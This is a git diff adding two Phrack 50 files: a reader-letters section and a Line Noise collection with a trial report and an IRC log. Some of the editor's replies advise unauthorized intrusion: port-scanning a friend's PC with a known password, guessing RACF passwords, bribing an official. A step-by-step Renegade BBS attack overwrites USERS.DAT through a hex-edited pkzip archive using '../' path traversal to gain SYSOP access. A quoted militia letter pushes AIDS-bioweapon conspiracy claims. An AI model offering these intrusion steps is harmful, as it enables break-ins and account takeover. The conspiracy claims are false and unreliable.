++1 617 262 6444. You can't go wrong with the Works. We want you to call.
+
+[ It's amazing that BBSes like The Works are still around, even with a bit
+  of down time.  What's it been?  10 years?  Geez.
+
+  You're approaching the longevity of Demon Roach or P-80. ]
+
+-----------------------------------------------------------------------------
+
+I'm doing research on hackers for my LIB 105 class and have come across
+some of what I guess is tech speak or jargon. I've noticed that the
+letters 'PH' are frequently used to intentionaly mispell the words
+phreak, lopht, and in Phrak Magazine. Is there a reason behind all of
+these PHunny spellings?
+
+[ Uh, PH as in Phone.  From the old Phone "Phreak" subculture of the
+  late 60's, early 70's.]
+
+-----------------------------------------------------------------------------
+
+
+I think a great idea for a future article would be how to make a decoder
+card for a DSS sattelite reciever with some easy commercial stuff and a
+cmos Z-80 I.C. ...
+
+[ If it were that easy, there would be a bigger number of players in the
+  billion dollar industry of satellite piracy.  A key figure in that
+  closed community once told me that it cost them about $1,000,000 US to
+  crack each new rev of smart card.  (But when you figure that means only
+  selling 10000 pirate cards at 100 bucks, the cost of doing business
+  is minimal, compared to the cost of the service provider sending out
+  new software and cards to each subscriber.) ]
+
+
+-----------------------------------------------------------------------------
+
+Hi, I am a Primestar installer, I was wondering if you knew anything about
+how to stop Primestar from de-authorizing their unused IRD's? I know of 2
+installation screens accessable through the password screen using #'s 996 &
+114, do you know of any others? I would appreciate any info you might have.
+
+Thanks,
+
+[ And Phrack would appreciate ANY info you have!  ANYTHING!  EVERYTHING!
+  As an installer, you probably have some insights into the cards/recievers
+  that we don't.  Write them up! ]
+
+
+-----------------------------------------------------------------------------
+
+For certain reasons, some people may want to create a new anonymous mail
+box. Did they considered to create it in France?
+A lot of IPS offer the possibility to create mailboxes to those who have
+no computers by using a primitive look-alike telnet system: the French
+Minitel. This is convenient because a couple millions of Minitel have
+been freely distributed in France during the last ten years. The only
+cost is that an overcharge is billed to your phone bill of approx
+35cents per minute. But this is perfectly legal and hard to trace back.
+Hyperterminal (at least in its french version) emulates the french
+minitel.
+
+The only thing is to dial 3615 in France and use one of this server:
+ABCNET, ACENET, ADNET, ALTERN,FASTNET,EMAIL...
+For example, EMAIL creates an e-mail adresse like:
+pseudonym@xmail.org.
+
+The only thing is that you have to know a little bit of French to use
+it, but just a little bit.  The cost of a call (International and
+Minitel overcharge) should not be a problem to some of you.
+LeFrenchie
+
+[ This is a good idea.  People outside of France don't know much about
+  Minitel, (Or any videotext systems) since they failed in a big way
+  here in the states and most other countries.  Many old hackers might
+  remember some of the Minitel Chat systems also accessible over X.25 such
+  as QSD (208057040540), but without emulation software wouldn't have
+  ever had access to the real Minitel. ]
+
+
+-----------------------------------------------------------------------------
+
+Two questions
+
+1 How can I connect to an IRC server though a firewall?
+2 How can I intercept messages sent to chanserv and nickserv on Dal.net?
+
+Thank you.
+
+[ 1. Open up ports 6665-6667
+  2. Set up a hacked IRC server.  Get someone important to add it to the
+     EFNET server hierarchy.  Look for PRIVMSG to whomever you want. ]
+
+-----------------------------------------------------------------------------
+
+Hello,
+    A modem has a light buffer between the copper wires of the
+    telephone line and the rest of the copper printed circuit ( mother)
+    board. How ( or does) does a firewall prevent hacks on a system or
+    is this just a matter of Modern (Mastodon) buffalo hunting: They
+    go down the same big or small. Specifically , beyond smart self
+    learning systems can a server realy prevent  contamination without
+    the intervention of beings? My sister a suposed Webmistress says
+    there are intervening buffers, I still see that between what ever,
+    there is a very big freaking leap of faith..
+										     Senor Please Elucidate
+Richard
+
+[ Uh, if you think the "firewall" is that light buffer between the wires,
+  then you have missed the point.  A firewall in the networking context is
+  not the same as the metal firewall in your automobile....it is merely
+  a metaphor that has been adopted as the term d'jour.
+
+  Please read:  Building Internet Firewalls by Brent Chapman &
+  Elizabeth Zwicky or Firewalls & Internet Security by Cheswick & Bellovin ]
+
+
+-----------------------------------------------------------------------------
+
+
+> Drop us a line on what you think of 49.  Comments are encouraged.
+
+I think issue 49 was great, not to mention getting it out on time. I do have
+a suggestion though. The past few issues of Phrack have focused mainly on=20
+UNIX and not much else. I think UNIX is a great OS, but it would be cool if
+occasionally you would print a few articles about other systems. I would=20
+write one myself but right now I don't have anything new to contribute.=20
+
+Later,
+Tetbrac
+
+[ This has been a request for a long time.  Hopefully we'll get some
+  articles on other operating systems some day.  Personally, I'd like
+  to see VMS, MVS and OS-400.  Any takers?  ]
+
+
+-----------------------------------------------------------------------------
+
+I just finished reading issue 48, and congratulate you on some excellent
+techinical articles.  I have only one (rather insignificant) comment:
+within the article #13 on project neptune, it was stated:  "[the urgent
+pointer] is TCP's way of implementing out of band (OOB) data."  Actually,
+URG pointers are in band (specification-wise), however most (but not all)
+TCP implementations map the URG flag to out of band.  While this point is
+irrelevant to SYN flooding, I thought I would present it in case anyone who
+read the article is interested in pursuing any nuts & bolts transport layer
+implementations.  Keep up the good work, and keep turning out more of this
+kind of technical information.
+
+ammit-thoth
+
+[ Point noted.  Thanks! ]
+
+
+-----------------------------------------------------------------------------
+
+Listen... you've probably been noticing that I've mailed you guys a
+couple times asking for help with hacking. Before I have never recieved
+any mail back. You have got to please mail me back this time. I found
+something on accident that is really out of my league. You guys are the
+best I know of that might be able to help me. I really need your help on
+this one. I was fucken around on Telnet just typing in numbers in the
+Chicago area code. On accident I typed in numbers and I entered a NASA
+Packet Switching System ( NPSS). It said it was a government computer
+system and to leave right away. Please mail me back for the numbers. I
+need your help to get into this system.... I need yer help.
+
+[ Let me guess, you typed the prefix 321 instead of 312 while playing
+  on Telenet.  The systems you'll find on that prefix have been hacked
+  at for nearly two decades now.  Systems on the network were targeted
+  in the 80's by Germany's Chaos Computer Club, and I personally know
+  they have been poked at by groups in the US, UK and Australia
+  starting back in 1981.
+
+  What I'm trying to say is, after so many years of people beating on the
+  same few systems, shouldn't you look for something a bit less stale? ]
+
+
+-----------------------------------------------------------------------------
+
+Dear phrack,
+
+I want to be added to the list. I was also wondering if you had ay
+publications or information on TEMPEST monitoring? Also know as Van Eck
+monitoring.
+
+[ We published a Dr. Moeller's paper continuing on Van Eck's work
+  in Phrack issue 44.
+
+  You might also want to check out http://www.thecodex.com
+  for a self-contained anti-tempest terminal for about 10K. ]
+
+
+-----------------------------------------------------------------------------
+
+I just read your editorial in Phrack 48 and I feel like giving you my two=
+ cents
+worth.  I think you did an excellent critique on the "scene."  As a person
+who has been watching for a while, and as a person who has been through it,
+I found it nice, to say the least, to find others who actually seem to have
+their head on straight.  This letter was originally much longer, but I
+shortened it because I think you get the point.
+
+I started programming computers in 1983 at the age of 6.  I was running
+DOS 2.0 and I had a blazing fast 1200 baud modem.  At the time, I had
+no mentors, no teachers, no friends that could teach me how to use that
+incredible machine.  The books of the time were cryptic, especially for an
+age where most children could not read, much less program.  But I did my=
+ best.
+Ten years later, I was still on my own.
+
+I didn't get ahold of a copy of Phrack until 1991.  I thought it was really
+cool that people like me would get together and exchange infomation, talk
+computers, etc.
+
+In '94, I got into viruses and prolly was one of the better independant
+(i.e. not in a group) writers.  It was about that time I got onto IRC.
+Most of the time I would hang out in #virus, but every now and then I
+would pop into #hack.  I never stayed...I couldn't stand the arrogance.
+
+Shortly before I went to school, I was in competition for control of a
+new freenet versus a local hacker group.  A month after I went to college,
+that group got busted.  I got lucky.
+
+Earlier this year, I went on Good Morning America to talk about viruses.
+Looking back, it is prolly the single dumbest thing I have done in my
+whole life.
+
+As much as I wanted to, I've never been to a 2600 meeting, never been to
+a Con.  Never really had any hacker friends.  It's always been just me.
+I'm sure I know less about breaking into computers than the guy who has
+been doing it for a week but has access to tons of partners.  But I still
+consider myself a hacker.  My interest has been one of learning about the
+system.  I've been learning longer than most.  I rarely break into
+a system.  I have access to unix systems, and even a VAX.  I don't want
+the latest hacking tools.  I write my own, with my theories.  I don't
+need much else.  But I've never had anyone to share it with.  But I think I
+realize that the past is the past, and I won't ever get to attend the old
+cons or sit on conference calls, as much as I'd love to.  I won't bother
+with the latest cons because I can get the same stuff at a college party.
+
+Well, that is about it.  I apologize if it is poorly written.  Bad english
+skills :)  I hate writing these because I grow tired of getting slammed
+by some arrogant asshole.  Thats prolly why I have been doing this alone
+for 13 years.  After your editorial, I wonder how many people will stop
+showing up at the cons...I hate the isolation, but I would never want to
+be a part of a "scene" which has turned from mature goals to juvenile
+ones.  Just my thoughts...
+
+Evil Avatar
+
+[ Actually, I have more respect for the people who continue to stay in the
+  fringes, learning on their own rather than scurrying for attention
+  in the media and in the community.  (Yes, like me.)
+
+  To be fair though, don't sell yourself short by avoiding Cons if you
+  really want to check them out.  Despite all the ranting I did in that
+  editorial, I still have many friends in the community and enjoy
+  meeting new ones at conferences.  Not everyone thinks it is cool
+  to trash a hotel, or to try to out "elite" one another.  Unfortunately,
+  the loudest and most visible people at such events tend to be the
+  most juvenile.  If you find this happening, do what I do:  get the
+  hell out of the conference area and find a convenient bar.  The older
+  hackers will eventually find you there, and you can all drink in peace
+  and actually talk unmolested. ]
+
+-----------------------------------------------------------------------------
+
+
+Dear Phrack --
+
+Been a reader since the 80s, and I'm one of the originals... Would like
+to submit a poem that I wrote that details the experience of a hacker
+who left the scene for several years -- Coming back to find it in utter
+Dissaray... Definitely not the way he left it... Well -- You guys will
+let me know what you think
+
+"Where Have All The Hackers Gone"?
+----------------------------------
+
+Original Poetry by: Jump'n Jack Flash -916-
+
+
+On a cold night in the dead of winter a soul stumbles into #hack and asks:
+'Where have all the Hackers Gone?'
+
+Immediately the group recognizes him as one of the originals.
+
+'Help us change our grades!' a voice calls out from the huddled masses.
+'Help me hack root on a NYNEX system!' another voice asks.
+
+The soul clutches his bowed head and covers his ears, trying to remember
+back to before he involuntarily left the scene a few years ago.
+
+'The only thing that kept me sane while I was imprisioned was the
+thought of seeing my friends and fellow hackers, now I demand you tell
+me Where Have All The Hackers Gone?' the soul begs the crowd of jubulent
+newbies.
+
+Silence is the only answer he receives,
+For there are no real hackers here.
+
+Then a voice speaks up and says,
+'They're gone! You're the first we've seen!'
+The soul asks,
+'What do you mean?'
+
+And Silence is the only answer he receives,
+For there are now real hackers here.
+
+And like a wall crumbling down it comes to him and he falls to his knees,
+like hunting for human life after a Nuclear war he stumbles out of the room,
+And he hurries to the place where only the Elite could go just a few years=
+ ago,
+But when he arrives he is shocked and amazed,
+There are no hackers here on this dark winter day.
+
+And he stumbles into traffic,
+feeling the snow crunch beneath his feet,
+and he shouts into the night for the elite,
+
+'Where Have All The Hackers Gone?'
+
+And Silence is the only answer he receives,
+For there are no real hackers here.
+
+[ Nice poem man...thanks!
+
+  Where did the hackers go?  They grew up and got real jobs... ]
+
+-----------------------------------------------------------------------------
+
+I'd love to say that I'll miss Erik, but after that obnoxious, immature
+rant, all I can say is good riddance. Now maybe Phrack will be useful
+again.
+
+[ Well, I guess not everyone agrees with me, which is a good thing.
+  But, uh, I'm not gone man...just narrowing my duties...so fuck you. :) ]
+
+-----------------------------------------------------------------------------
+
+
+'' WARNING ''
+COVERT EXTERMINATION OF THE POPULATION. !!!=20
+THE UNITED NATIONS=3DNEW WORLD ORDER HAS TURNED AMERICA  INTO  A
+EXTERMINATION CAMP. THE PENTAGON GERM  '' AIDS ''  WAS CREATED
+AT A GERM WARFARE LAB AT FT, DETRICK, MD.  AIDS AND CANCER CELLS
+ARE BEING INJECTED INTO PEOPLE UNKNOWING UNDER THE GUISE OF VACCINES
+AND SOME PHARMACEUTICALS.
+
+SOMETIMES THE TRUTH IS SO UGLY WE DO NOT WANT TO BELIEVE IT. !!
+AND IF WE DO NOTHING, THEN WE DESERVE IT. !
+BELIEVE IT OR NOT.  DISTRIBUTE WIDELY.
+'' HACK OR CRACK THE  UNITED NATIONS =3D NEW WORLD ORDER. ''
+LONG LIVE THE POWER THROUGH RESISTANCE.'' !!!
+
+SONS  OF  LIBERTY  MILITIA
+312  S.  WYOMISSING,  AVE.
+SHILLINGTON,  PA.  19607    U.S.A.
+610-775-0497  GERONIMO@WEBTV.NET
+
+[ It's about time we got some mail from some kind of Militia-types!
+  Let's all arm up to prepare for the revolution!  A healthy dose
+  of AK-47's and PGP will save us all from the ZOG hordes when the
+  balloon goes up.
+
+  Hey, have you guys read the Turner Diaries by Andrew Macdonald?
+  Get it from Barricade Books, 150 5th Ave, NY, NY 10011.
+
+  Ahem.  ]
+
+-----------------------------------------------------------------------------
+
+i want a credit card generator
+
+[I want a pony]
+
+-----------------------------------------------------------------------------
+
+Hello !!!
+
+I just read in P48-02 the letter of the russian subscriber who tells you=20
+(the editors) the story about the FAPSI and they plan to order all=20
+ISPs to provide for a possibilty for them to read all the mail.
+
+In the editor's note below that you say that you fear your country (I assume
+it's the USA) is also heading towards that goal.=20
+
+Well, I live in Germany, and it has already happened here. That means,=20
+every ISP (and this is not the exact term, as it also includes all sorts
+of information providers, ie telephone companies - but excludes=20
+private BBSs, I believe) are forced to provide a method that not only
+- Allows the government/police to read everything that is written but also
+- Without even the ISP noticing it (though I don't know how this would=20
+  be ensured, technically).
+ =20
+OK, this is not the same as in Russia, as they don't copy ALL the mail and=
+=20
+news, but only that of persons suspected of a crime strong enough=20
+to allow it, ie it's the same thing that's needed to open people's=20
+mails. Still, I feel it's certainly a step in the wrong direction.
+
+Note that cryptography is not (yet ?) forbidden in de.
+ =20
+Regards,=20
+=20
+Thomas=20
+
+[ Germany?  Governmental rights violations?  Say It isn't so!  Should I get=
+ my
+  brown shirt out of the closet for my next visit to Berlin?  :)  ]
+
+-----------------------------------------------------------------------------
+
+
+Hello, I want to be a hacker and  I need some help.  I have read
+countless reports on UNIX, VMS, and all that other jazz but that still
+doesn't help me with my problem.
+
+I want to be able to hack into someone's home PC from my own home.  Now,
+most PC's aren't   capable of doing this but, this person has a
+connection on the internet and is also linked to his work in LONDON,
+ONTARIO at a place called IAPA.  (industrial accident prevention
+association)  Anyway, he runs WINDOWS 95' and is using NETCOM.  Now I
+know his password if that does me any good, but how do I go about doing
+this?
+
+SHAOULIN
+
+[ When you say "I want to hack his home PC" what do you mean?
+
+  Just because he uses NETCOM, that doesn't mean you can find him.  He is
+  probably being assigned a dynamic IP address each time he calls in to the
+  network.  Even so, let's say you can discern his IP address.  Even if
+  a computer is hooked into the Internet, it is only as insecure
+  as the services it offers to the world.
+
+  If your friend is running Windows 95, then you may only be limited
+  to attacking any SMB-style shared directories or perhaps via FTP.
+  In either case, if you know this person's password, then you can
+  probably read/write anything you want to on their system.
+  Run a port scanner against it and see what you can access, and
+  plan based on that. ]
+
+-----------------------------------------------------------------------------
+
+This message was sent to you by NaughtyRobot, an Internet spider that
+crawls into your server through a tiny hole in the World Wide Web.
+ =20
+NaughtyRobot exploits a security bug in HTTP and has visited your host
+system to collect personal, private, and sensitive information.
+ =20
+It has captured your Email and physical addresses, as well as your phone
+and credit card numbers.  To protect yourself against the misuse of this
+information, do the following:
+ =20
+	1. alert your server SysOp,
+	2. contact your local police,
+	3. disconnect your telephone, and
+	4. report your credit cards as lost.
+ =20
+Act at once.  Remember: only YOU can prevent DATA fires.
+ =20
+This has been a public service announcement from the makers of
+NaughtyRobot -- CarJacking its way onto the Information SuperHighway.
+
+[ Funny, my phone isn't ringing, and my credit is still only as screwed up
+  as it was when I got through with it. ]
+
+-----------------------------------------------------------------------------
+
+Hi
+
+I'm looking for some cellular pheaking information
+but  is verry hard to find god information
+can giveme something to work on???    :-)
+
+[ The best site going is Dr. Who's Radiophone site at:
+
+  http://www.l0pht.com/radiophone ]
+
+-----------------------------------------------------------------------------
+
+I just have a question to ask.  How would I bypass Surfwatch so that I
+can go into web sites that I would like to see?
+
+[ It is very easy to bypass SurfWatch.  Stop using Mommy & Daddy's computer
+  and buy one of your own. ]
+
+-----------------------------------------------------------------------------
+
+i was recently using A-Dial a couple of months ago, and came up with about
+10 or 12 different numbers starting at 475-1072. Curious about this, I
+called one back, using a mini-terminal. What I expected wasn't this. What
+it said is in the file attached to the letter. It says the same thing with
+all of the numbers. I could use some info on what the hell this is, because
+I never heard of Annex. Thanx.
+
+Data Case
+
+[ What you have connected into is more than likely a kind of terminal
+  server.  From there you can usually enter a system name to connect
+  directly into the specified system, or enter in "cli" to go into the
+  command line interpreter where you have more options to choose from
+  including "help." ]
+
+
+-----------------------------------------------------------------------------
+
+
+Do you know where I can find texts on hacking into the California=20
+Department of Motor Vehicle Records?  My friend's identity was stolen=20
+for credit card fraud and the person who did it even went so far as to=20
+get a CA driver's license to impersonate her.  The worst part is that=20
+Visa won't release a copy of the fraudulent person's fake driver's=20
+license to my friend, so she can't find out who this person actually is.=20
+Do you know of any other ways we can get this person?
+
+Binky
+
+[ Gee, Binky.  If VISA is involved and it was credit card fraud, then
+  is the Secret Service involved too?  If so, then why on earth do you
+  (or your friend) want to get in the middle of it?  You'll know soon
+  enough who the person is when they get charged, or is this just a
+  Charles Bronson style vigilante thing?
+
+  California's DMV (as well as most public records databases in that
+  state) is kept somewhat restricted to public queries due to the large
+  number of celebrities living in the state, or otherwise you could just
+  go buy the information directly from the state.
+
+  If you're thinking about pulling a "Mitnick" and breaking into such
+  a database, then you better know something about IBM mainframes and
+  know how to defeat RACF.  Or be willing to dig around in the trash
+  until you locate a valid account.  Even if you find a valid RACF userid,
+  you will have 3-5 tries per account to guess a valid password until the
+  account is locked out (which of course will let them know you were
+  trying to hack them.)
+
+  For an easier solution, you might want to looking in the yellow pages
+  for a private investigator and have them do a search on Information
+  America or NIA and get the listing for you, or bribe a civil servant. ]
+
+
+-----------------------------------------------------------------------------
+
+
+EOF
+
+
diff --git a/phrack50/3.txt b/phrack50/3.txt
new file mode 100644
index 0000000..7bbd572
--- /dev/null
+++ b/phrack50/3.txt
@@ -0,0 +1,595 @@
+                                .oO Phrack 50 Oo.
+
+                            Volume Seven, Issue Fifty
+
+                                     3 of 16
+
+ 
+                             //   //  /\   //   ====
+                            //   //  //\\ //   ====
+                           ==== //  //  \\/   ====
+
+                       /\   //  // \\    //  /===   ====
+                      //\\ //  //   //  //   \=\   ====
+                     //  \\/    \\ //  //   ===/  ====
+
+------------------------------------------------------------------------------
+
+                                ----<>----
+
+
+                            =--=--=--=--=--=--=--=
+                             Portable BBS Hacking
+                                  by: Khelbin
+                            =--=--=--=--=--=--=--=
+
+
+     This hack basically has little to do with the BBS software itself but
+with the archiver which is being used.  I've used this technique on a 
+mock Renegade setup and with pkzip/pkunzip as the archiver.  I'm sure
+that this same type of technique will be successful on many other BBS
+platforms and with other archivers as well.  While explaining this, I will
+use Renegade and pkzip/pkunzip as my example.
+
+    A Renegade setup is most likely vulnerable if it will pkunzip any user
+supplied zipfile.  This is because Renegade's default command to unzip files
+is "pkunzip -do <filename>".  The -d flag unzips the file retaining any
+directories which were included into the zip file and the -o flag will 
+automatically overwrite any file. 
+
+    Suppose the remote system is also setup in a normal Renegade fashion.
+Let's use this file tree as an example:
+
+     C:\RENEGADE\
+     C:\RENEGADE\TEMP\
+     C:\RENEGADE\DATA\            
+
+    The other subdirectories are unimportant for our discussion.  Suppose 
+that C:\TEMP is where our uploaded file will go for it to be unzipped and
+then scanned for viruses.  C:\RENEGADE\DATA\ is where the USERS.DAT file 
+is stored, containing all the users login information.  
+
+     Wouldn't it be nice if we could put our own USERS.DAT in there instead?
+To do this, you must first generate a USERS.DAT file.  This is easy enough.
+Just download a copy of Renegade which is the same version as the target
+machine and then use the user editor to make a "SYSOP" account with the 
+password "SYSOP" (this should be the default anyway on the USERS.DAT file).
+
+     Here's how we prepare the zipfile on our own machine:
+
+         C:\>md tmp
+         C:\>md c:\tmp\ddsdata
+         C:\>copy c:\renegade\data\users.dat c:\tmp\ddsdata
+         C:\>cd tmp
+         C:\TMP>pkzip -pr evil.zip
+
+     Now we get out our trusty hex editor and edit evil.zip.  Change every
+occurrence of "ddsdata" in evil.zip to read "../data" and make sure that the
+slash is a forward-slash and not a back-slash.  Now when you upload
+evil.zip to this particular BBS, it will expand to "../data/users.dat"
+and your USERS.DAT file will overwrite their USERS.DAT file since the -od
+flag is default on Renegade.  
+ 
+     Now you can login as SYSOP with a password SYSOP and do as you please. 
+You could also overwrite virtually any file on a BBS like this and believe 
+me,  many do have this vulnerability or something very close to it.  You are 
+only limited in how much you can traverse up and down directories by DOS's 
+maximum file length of 12 (8 plus "." plus 3 = 12).  I quickly tried 
+inserting a few blocks into the zipfile in order to produce a limitless 
+amount of traversing which but it seemed to corrupt the file for some 
+reason.
+
+     Removing the -o flag is not a fix for this bug.  Without the -o flag,
+you can "hang" the system in a denial of service attack.  By again hex 
+editing the names of the files within your evil.zip, you can make it have 
+two files with the same name.  When it tries to unzip the second file, it 
+will prompt locally whether to overwrite the file or not and "hang" the 
+board.  Instead, the -d flag is what should be removed.
+
+     This is just an example as I'm sure many other BBS systems do this same
+type of uncompressing.  I'd also bet that arj, lha, and several others, can
+also be hex edited and yield similar results.  Either way, it's either take
+out the "restore/create directories within archive" option or pay the price.
+
+
+                                ----<>----
+
+
+ German Hacker "Luzifer" convicted   by SevenUp / sec@sec.de
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SYNOPSIS
+========
+On February 5th, 1997, Wilfried Hafner aka "Luzifer" was sentenced to
+three years incarceration - no parole, no probation.  I've got the story
+for you right from the courtroom in Munich, Germany.  This is one of the
+first ever cases in which a hacker in Germany actually gets convicted, so
+it's particularly interesting. (Although the court and I use the term
+"hacking", this is actually a case of unethical electronic fraud.)
+
+
+LUZIFER
+=======
+Wilfried Hafner (Luzifer) was born on April 6, 1972, in Breschau Italy.
+According to his own circulum vitae, which he quoted in court himself,
+he's been a pretty smart guy: He started programming at 8 years,and cracked
+about 600 Commodore programs, at 14, got a modem and then started a BBS.
+In 1990 he was blueboxing to some overseas partylines to communicate with
+others.  But he didn't seem to use any other "elite" chat systems like x.25 
+or IRC, so most people (including myself) didn't know him that well.  In
+1992 he moved to South Germany to goto school.
+
+
+WHAT HE DID
+===========
+Luzifer set up some overseas partylines in the Dominican Republic,
+Indonesia, The Philippines, and Israel.  Some lines included live chat,
+but most were just sex recordings.  Then he used a local company PBX (a
+Siemens Hicom 200 model), from his homeline, which was only "protected"
+by a one digit code, to dialout to his partylines and his girlfriend in
+Chile.  He also was blueboxing (which the prosecution calls "C5-hacking")
+from five lines simultaneously, mostly via China.  To trick the partyline
+provider and overseas telcos (who are aware of computer-generated calls)
+he wrote a little program that would randomize aspects of the calls
+(different calling intervals and different durations for the calls).
+
+He got arrested the first time on 03/29/95, but was released again after 
+13 days.  Unfortunately he restarted the phreaking right away.  If he'd 
+had stopped then, he would just have gotten 1 year probation.  However, he
+was arrested again in January 1996, and has been in prison since.
+
+Here are some numbers (shouts to Harper(tm)'s Index):
+- Number of logged single phone connections:       18393
+- Profit he makes for 1 min. partyline calls:      US$ 0.35 - 0.50
+- Total Damage (= lost profit of telco):           US$ 1.15 Million
+- Money that Luzifer got from the partylines:      US$ 254,000
+- Paragraph in German Law that covers this fraud:  263a StG
+- Duration of all calls, if made sequentially:     140 days
+
+
+THE TRIAL
+=========
+This trial was far less spectacular than OJ's.  While 7 days had been
+scheduled, the trial was over after the second day.  The first day went 
+quite quick: The court didn't have enough judges available (two were present, 
+but three required), so it had to be postponed after some minutes.
+
+At the second day, both, the prosecution and Luzifers two lawyers, made
+a deal and plead guilty for three years prison (but no financial punitive). 
+In Germany, all sentences over two years cannot be carried out on probation.
+But he has been allowed the use of a notebook computer.  Rumor has it that
+he might be get an "open" execution, meaning that he has to sleep in the 
+prison at night, but can work or study during the day.
+
+The deal looked like the prosecution dropped all counts (including 
+the one abusing the PBX in the first place) but two: one for the blueboxing 
+before getting arrested, and one count for blueboxing afterwards.  They don't 
+treat all 18393 connections as a separate count, but just each start of the 
+"auto-call-program".
+
+
+QUOTES
+======
+Here are some interesting and funny quotes from the trial:
+"Just for fun and technical curiosity" - Defendant
+"Wouldn't one line be enough for technical experience"? - Judge
+"I ordered 21 lines, but just got 5" - Defendant
+"Lots of criminal energy" - Prosecutor
+"He's obsessed and primarily competing with other hackers" - Lawyer
+"A generation of run down computer kids" - Prosecutor
+"He may keep the touchtone dialer, but we cannot return his laser fax,
+ because the company's PBX number is stored in its speedial" - Prosecutor
+"Myself and the Telekom have learned a lot" - Prosecutor
+"New cables must be installed, new satelites have to be shot into the air" 
+  - Prosecutor about the consequences of used up trunks and intl. lines
+"The German Telekom is distributing pornography with big profits" - Lawyer
+
+
+                                ----<>----
+
+
+        Yet another Lin(s)ux bug!
+	By: Xarthon
+
+        IP_MASQ is a commonly used new method of traffic forwarding which
+may be enabled in newer Linux kernel versions.  I have been doing some
+research into this new feature.
+
+        IP_MASQ fails to check to make sure that a packet is in the non
+routable range.  If you are able to get any packet to its destination, the
+header of that packet is rewritten.
+
+        Because of the lack of non-routable ip checking, the same tactics
+that would be used a gateway machine, may also be used on a machine that
+uses ip_masq.
+
+        So in conclusion, you are able to spoof as if you are on the
+inside network, from the outside.  But hey, what can you expect from
+Linux?
+
+
+                                ----<>----
+
+                                 11.22.96
+
+		daemon9 and w0zz's adventure into warez-pup land... 
+
+
+
+*W|ZaRD* u there?
+-> *W|ZaRD* yes?
+<w0zz> d9
+<d9> hi w0zz
+*W|ZaRD* r u the prez of BREED?
+*** |COBRA| invites you to channel #supreme
+<d9> I am hungry
+-> *W|ZaRD* yup
+*_e|f_* hi there - you got a minute?
+*W|ZaRD* alright.. i got a question for u...
+*** d9 (plugHead@onyx.infonexus.com) has joined channel #supreme
+*** Topic for #supreme: [SpR] Still in discussion phase! [SpR]
+*** #supreme _e|f_ 848703589
+*** Users on #supreme: d9 @{Imagine} @BL|ZZaRD @W|ZaRD @|COBRA| @_e|f_ 
+<_e|f_> re d9
+*** Mode change "+o d9" on channel #supreme by _e|f_
+<|COBRA|> today is going to be a bad day :(
+*W|ZaRD* would you be interested in merging with like 4-6 other groups to become 1 group.??
+*W|ZaRD* i mean. all the other groups have like 11 sitez and 8-10 suppliers like NGP
+*W|ZaRD* and if we merge we could be up there with Prestige, and Razor
+<_e|f_:#supreme> hello d9
+<d9> *W|ZaRD* i mean. all the other groups have like 11 sitez and 8-10 suppliers like NGP
+-> *W|ZaRD* hmm
+*** Inviting w0zz to channel #supreme
+<_e|f_> we got a discussion going on here for big plans for a lot of us "smaller" groups (smaller as
+        compared to razor, prestige etc) :)
+<d9> ah
+*** Mystic12 (NONE@wheat-53.nb.net) has joined channel #supreme
+<_e|f_> this is all still in discussion stages
+<w0zz:#!r00t> hahahaha
+*** Mode change "+o Mystic12" on channel #supreme by W|ZaRD
+<_e|f_:#supreme> but would you be interested in a joint venture between a few of us smaller release groups
+                 to combine into one large release group - to challenge razor and prestige?
+<d9> w0zz
+<w0zz> you've been sucked into warez kiddie conspiracies
+<d9> join me
+<w0zz:#!r00t> where are you?
+*** Inviting w0zz to channel #supreme
+*** w0zz (wozz@big.wookie.net) has joined channel #supreme
+<d9> well...
+*** Mode change "+o w0zz" on channel #supreme by d9
+<w0zz> werd
+<_e|f_> re wozz
+<d9> hi w0zz
+<w0zz> hi there
+<_e|f_> i can send u a log to flesh out a few more details if you like
+<w0zz> i've got mackin' warez
+<d9> hmm
+<d9> sure
+*w0zz* you recording this for line noise ?
+*w0zz* ;)
+-> *w0zz* indeed...;)
+*w0zz* heh
+<d9> the thing is, I have all this porn I want to unload...
+<w0zz> yah, i got da mackin porn too
+<d9> but, no good place to distro it...
+*** ^DRiFTeR^ (~Drifter@203.30.237.48) has joined channel #supreme
+*** Mode change "+o ^DRiFTeR^" on channel #supreme by _e|f_
+<_e|f_> hey drifter
+<d9> I was using this panix account, but all that SYN flooding stopped that cold...
+<_e|f_> drifter is muh vp :)
+<RAgent:#!r00t> do you even know what BREED is, route?
+<d9> warez pups?
+<_e|f_:#supreme> drifter: d9 and wozz are from breed
+<_e|f_:#supreme> blizzard and wizard are from NGP
+<^DRiFTeR^:#supreme> k
+<d9:#!r00t> HAHAHAhahahaha
+<Mystic12:#supreme> I am also from NGP
+*** Signoff: Mystic12 (Leaving)
+<W|ZaRD:#supreme> so is Mystic12
+<RAgent:#!r00t> well, looks like it.  just wondered if you knew them at all
+<d9> w0zz... you get the new shit I send you?
+*** Mystic12 (NONE@wheat-53.nb.net) has joined channel #supreme
+<w0zz:#supreme> yah
+<_e|f_:#supreme> sorry mystic - didnt see yew there
+<d9:#!r00t> nope!
+*** Mode change "+o Mystic12" on channel #supreme by W|ZaRD
+<w0zz> indexed and everything
+<RAgent:#!r00t> hahaha
+<w0zz> i spanked my monkey for hours
+<RAgent:#!r00t> whee
+<d9> werd.
+<d9:#!r00t> AAAAAHAHAHahahhahaha WOZZ!
+<_e|f_> brb
+<d9> hmm
+#supreme   Mystic12  H@  NONE@wheat-53.nb.net (CCINC)
+#supreme   ^DRiFTeR^ H@  ~Drifter@203.30.237.48 (ReaLMS oF Da NiTe - HrD)
+#supreme   w0zz      H@  wozz@big.wookie.net (w0zz)
+#supreme   d9        H@  plugHead@onyx.infonexus.com (Built Demon Tough)
+#supreme   {Imagine} H@  BOB@199.190.110.99 (.:tORn f#E?h:. v1.45 by SLaG)
+#supreme   BL|ZZaRD  H@  blizzard@ip222.tol.primenet.com (hehe)
+#supreme   W|ZaRD    H@  m3ntal@ip201.tol.primenet.com (M3NTaL)
+#supreme   |COBRA|   H@  cobra@slbri3p24.ozemail.com.au (100% ReVpOwEr)
+#supreme   _e|f_     H@  _e|f_@203.26.197.12 (blah)
+<w0zz:#!r00t> werd
+*** Mode change "-ooo _e|f_ |COBRA| W|ZaRD" on channel #supreme by d9
+*** Mode change "-ooo BL|ZZaRD w0zz ^DRiFTeR^" on channel #supreme by d9
+*** Mode change "-o Mystic12" on channel #supreme by d9
+<W|ZaRD> hehe
+*** Mode change "+o w0zz" on channel #supreme by d9
+<_e|f_> sigh
+<W|ZaRD> what would the new group name be.. if this happened?
+<d9> the new name?
+<W|ZaRD> hmm. nice takeover
+<W|ZaRD> hehe
